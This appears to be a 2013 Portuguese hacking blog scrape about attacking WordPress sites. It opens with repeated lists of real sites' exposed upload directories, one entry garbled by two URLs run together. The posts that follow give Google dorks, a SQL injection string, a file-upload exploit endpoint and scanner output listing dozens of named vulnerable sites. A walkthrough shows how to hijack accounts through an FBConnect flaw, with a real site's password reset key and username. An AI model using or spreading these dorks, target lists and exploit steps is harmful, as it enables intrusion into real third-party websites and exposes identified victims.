http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/egon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/

domingo, 15 de dezembro de 2013

Wordpress formcraft Plugin Sql Injection Mais SCANNER INURL

Wordpress formcraft Plugin Sql Injection


#################################################################################
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Testado: Windows , Linux
#################################################################################
# Tipo Exploit : Sql Injection
#
# Local: [alvo]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Injeção de exploit: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################

Usando o  SCANNER INURL 1.0 - INTERFACE para capturar URL's com esse tipo de falha.
Down: https://code.google.com/p/scanner-inurl/


CONFIGURAÇÃO
Wordpress formcraft Plugin Sql Injection SCANNER INURL
RESULTADO
Wordpress formcraft Plugin Sql Injection SCANNER INURL RESULTADO

TOTAL DE URL's: 78

EXPLOIT USADO:

DORK: inurl:/wp-content/plugins/formcraft/form.php?id=

TIPO DE ERRO: PERSONALIZADO

PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=

TOTAL DE POSSÍVEIS VULL: 47

ARQUIVO COM RESULTADO: resultados.txt

terça-feira, 26 de novembro de 2013

Wordpress Themes Pinboard Arbitrary File Upload Vulnerability

BUG WP THEMES PINBOARD


EXPLOIT WP ~~~
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/Pinboard
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload


#Dork[1] : inurl:/wp-content/themes/pinboard/
#Dork[2] : inurl:site:br /themes/pinboard/
 #Dork[3] : inurl:/themes/pinboard/ ext:php

Falha:
#Exploit : http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/themify/themify-ajax.php

ARQUIVO UPADO:

http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/uploads/{ARQUIVO}.php


EXPLOIT UPLOAD:http://pastebin.com/FwSP3bQT

sexta-feira, 22 de novembro de 2013

Usando SCANNER INURL para encontrar Vull's WP

EXPLOIT
Wordpress Amplus Theme - CSRF Vulnerability
Wordpress Amplus Theme - CSRF Vulnerability
RESULTADO
Usando SCANNER INURL Wordpress Amplus Theme - CSRF Vulnerability

BOT - SCANNER PRIV8 / - INURLBR

TOTAL DE URL's: 86

EXPLOIT USADO:

DORK: inurl:/themes/amplus/
ENCONTRAR: /amplus/scripts/
TOTAL DE POSSÍVEIS VULL: 37
ARQUIVO COM RESULTADO: resultados.txt

LISTA:


http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/backgrounds/
http://telplus-inc.com/blog/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/fonts/
www.intuneautoworks.com/home/wp.../
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/fonts/
http://wnglaw.com/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://punc.psiada.org/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://amaboston.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
http://www.avia-sys.com/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.promisenaturalfoodsandbakery.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://light-eco-distribution.com/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/light_square/
http://www.dominiquediprima.com/wellness/wp-content/themes/amplus/scripts/fonts/
http://ringhello.co.uk/wp-content/themes/amplus/scripts/prettyphoto/
http://www.theglobalwarmingfoundation.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
www.theglobalwarmingfoundation.org/wp.../
http://www.kidzrchampions2.com/wp-content/themes/amplus/scripts/prettyphoto/images/thumbnails/
www.kidzrchampions2.com/wp.../
http://www.buc-holland.com/wp-content/themes/amplus/css/
http://training.dontsayno.in/wp-content/themes/amplus/amplus_v1.6/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/css/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/dark_square/
http://www.gambit.ph/themes/amplus
http://takeadriver.nl/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.friendslookup.com/wp-content-themes-amplus-functions-timthumb


Exploit: http://www.exploit-db.com/exploits/29669/

segunda-feira, 28 de outubro de 2013

WPSCAN scanner

WPScan
WPScan console

WPSCAN é um scanner feito em Ruby que busca possíveis vulnerabilidades em seus alvos com CMS Wordpress.

Este programa é software livre: você pode redistribuí-lo e / ou modificá-lo sob os termos da GNU General Public License conforme publicada pela Free Software Foundation, tanto a versão 3 da Licença, ou (a seu critério) qualquer versão posterior.

domingo, 6 de outubro de 2013

EXPLOIT CMS WORDPRESS / FBCONNECT

/*
  ###################################################################
  EXPLOIT CMS WORDPRESS / FBCONNECT
  By: GoogleINURL
  REF:http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
  REF:http://aurruz.com/post/1790/   
 DORK['1']:inurl:"/?fbconnect_action=myhome"
  ###################################################################
*/

  EXPLOIT CMS WORDPRESS / FBCONNECT

Modo de usar:

http://localhost/script.php?url=http://alvo.com.br/
http://localhost/script?url=http://boneramamusic.com/
http://localhost/script.php?url=http://alvo.com.br/compasta

Ao carregar pela primeira vez ele vai tentar exploitar aparecendo dados usuário,login,senha significar que está vull.

O passo seguinte é pedir uma nova senha com usuário que temos acesso.

Quando efetuar o pedido seria enviado uma KEY de ativação para o email do usuario, no qual a mesma KEY fica no BD do wordpress.

O envio concluido dé um refresh na pagina onde podemos observar que aparece alem de usuario & senha tem agora o USE_ACTIVATION_KEY

E uma URL já formata para trocar a senha do usuário.

http://boneramamusic.com/wp-login.php?action=rp&key=[USE_ACTIVATION_KEY]&login=[USER]

http://boneramamusic.com/wp-login.php?action=rp&key=smnw8z7n70mG0ubbT91j&login=Mark Mullins


SCRIPT: http://pastebin.com/CysgK2Zf

Porem creio que já foi corrigido essa falha, mas está aé o script para estudar e criar exploits futuros.